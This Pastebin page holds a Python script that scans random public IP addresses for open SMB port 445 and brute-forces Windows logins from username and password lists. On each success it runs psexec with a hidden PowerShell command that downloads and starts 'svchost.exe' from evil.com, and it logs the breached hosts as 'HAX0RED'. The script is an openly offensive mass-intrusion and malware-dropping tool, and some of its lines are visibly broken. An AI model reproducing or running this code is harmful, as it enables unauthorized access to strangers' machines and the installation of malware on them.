Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import os
- from pypsexec.client import Client
- import socket
- import time
- import threading
- import itertools
- import random
- from impacket.examples.smbclient import MiniImpacketShell
- from impacket.smbconnection import SMBConnection
- fh1=open("user.txt", "r")
- fh2=open("pass.txt", "r")
- users=fh1.read().replace("\r", "").split("\n")
- passwords=fh2.read().replace("\r", "").split("\n")
- fh1.close()
- fh2.close()
- global maxthreadsglobal
- maxthreadsglobal=500
- global globalthreads
- globalthreads = 0
- def testPW(ip, user, passwd, fh):
- global globalthreads
- globalthreads += 1
- try:
- smbClient = SMBConnection(ip, ip, sess_port=445)
- smbClient.login(username, password, '', '', '')
- os.popen("psexec \\" + ip + " -u " + user + + " -p \"" + password + " powershell -NoP -NonI -W Hidden -Exec Bypass \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://evil.com/svchost.exe\\\",\\\"$env:temp\\svchost.exe\\\"); Start-Process \\\"$env:temp\\svchost.exe\\\"\"")
- print("HAX0RED ----> " + ip + ":" + user + ":" + passwd)
- fh.write("HAX0RED ----> " + ip + ":" + user + ":" + passwd + "\r\n")
- fh.flush()
- globalthreads -= 1
- return True
- except Exception as e:
- pass
- print("T3ST3D ----> " + ip + ":" + user + ":" + passwd)
- globalthreads -= 1
- return False
- def brute(ip, fh):
- global maxthreadsglobal
- global globalthreads
- print("BRUTING ----> " + ip)
- threads = 0
- maxthreads = 50
- for user in users:
- for passwd in passwords:
- threads += 1
- if threads == maxthreads or globalthreads >= maxthreadsglobal:
- time.sleep(random.randrange(1,10))
- threads = 0
- try:
- t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
- t.start()
- except:
- time.sleep(random.randrange(1,10))
- try:
- t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
- t.start()
- except:
- pass
- def Scan(IP):
- try:
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(1)
- s.connect((IP, 445))
- s.close()
- return True
- except:
- return False
- def gen_IP():
- not_valid = [10,127,169,172,192,185]
- first = random.randrange(1,256)
- while first in not_valid:
- first = random.randrange(1,256)
- ip = ".".join([str(first),str(random.randrange(1,256)),
- str(random.randrange(1,256)),str(random.randrange(1,256))])
- return ip
- def gen_IP_block():
- not_valid = [10,127,169,172,192,185]
- first = random.randrange(1,256)
- while first in not_valid:
- first = random.randrange(1,256)
- ip = ".".join([str(first),str(random.randrange(1,256)),
- str(random.randrange(1,256))])
- return ip+".0-255"
- def ip_range(input_string):
- octets = input_string.split('.')
- chunks = [map(int, octet.split('-')) for octet in octets]
- ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]
- for address in itertools.product(*ranges):
- yield '.'.join(map(str, address))
- def HaxThread(fh):
- while 1:
- try:
- IP = gen_IP()
- if Scan(IP):
- if Scan('.'.join(IP.split(".")[:3])+".2") and Scan('.'.join(IP.split(".")[:3])+".254"):#entire ip range most likely pointed to one server
- brute(IP,fh)
- continue
- else:
- for IP in ip_range('.'.join(IP.split(".")[:3])+".0-255"):
- if Scan(IP):
- brute(IP,fh)
- except Exception as e:
- print(str(e))
- pass
- threads = int(raw_input("Threads: "))
- fh = open("smb_vulnz.txt","a")
- threadcount = 0
- for i in xrange(0,threads):
- try:
- threading.Thread(target=HaxThread, args=(fh,)).start()
- threadcount += 1
- except:
- pass
- print("[*] Started " + str(threadcount) + " scanner threads!")
- print("Scanning... Press enter 3 times to stop.")
- for i in range(0,3):
- raw_input("")
- os.kill(os.getpid(),9)
Add Comment
Please, Sign In to add comment